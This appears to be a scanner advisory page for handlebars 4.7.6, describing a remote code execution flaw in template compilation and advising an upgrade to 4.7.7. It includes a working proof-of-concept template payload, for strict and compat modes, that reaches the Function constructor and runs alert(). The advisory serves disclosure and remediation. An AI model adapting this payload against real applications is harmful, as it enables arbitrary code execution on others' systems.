handlebars@4.7.6

Vulnerabilities

1 via 1 paths

Dependencies

5

Source

npm

Find, fix and prevent vulnerabilities in your code.

Severity
  • 1
Status
  • 1
  • 0
  • 0

medium severity
new

Remote Code Execution (RCE)

  • Vulnerable module: handlebars
  • Introduced through: handlebars@4.7.6

Detailed paths

  • Introduced through: handlebars@4.7.6
    Remediation: Upgrade to handlebars@4.7.7.

Overview

handlebars is an extension to the Mustache templating language.

Affected versions of this package are vulnerable to Remote Code Execution (RCE) when selecting certain compiling options to compile templates coming from an untrusted source.

POC

<script src="https://cdn.jsdelivr.net/npm/handlebars@latest/dist/handlebars.js"></script> 
<script> 
// compile the template 
var s = ` 
{{#with (__lookupGetter__ "__proto__")}} 
{{#with (./constructor.getOwnPropertyDescriptor . "valueOf")}} 
{{#with ../constructor.prototype}} 
{{../../constructor.defineProperty . "hasOwnProperty" ..}} 
{{/with}} 
{{/with}} 
{{/with}} 
{{#with "constructor"}} 
{{#with split}} 
{{pop (push "alert('Vulnerable Handlebars JS when compiling in strict mode');")}} 
{{#with .}} 
{{#with (concat (lookup join (slice 0 1)))}} 
{{#each (slice 2 3)}} 
{{#with (apply 0 ../..)}} 
{{.}} 
{{/with}} 
{{/each}} 
{{/with}} 
{{/with}} 
{{/with}} 
{{/with}} 
`;

var s2 = `{{'a/.") || alert("Vulnerable Handlebars JS when compiling in compat mode'}}`; var template = Handlebars.compile(s, { 
strict: true 
}); 
var template = Handlebars.compile(s2, { 
compat: true 
}); 
// execute the compiled template and print the output to the console console.log(template({})); 
</script>

Remediation

Upgrade handlebars to version 4.7.7 or higher.

References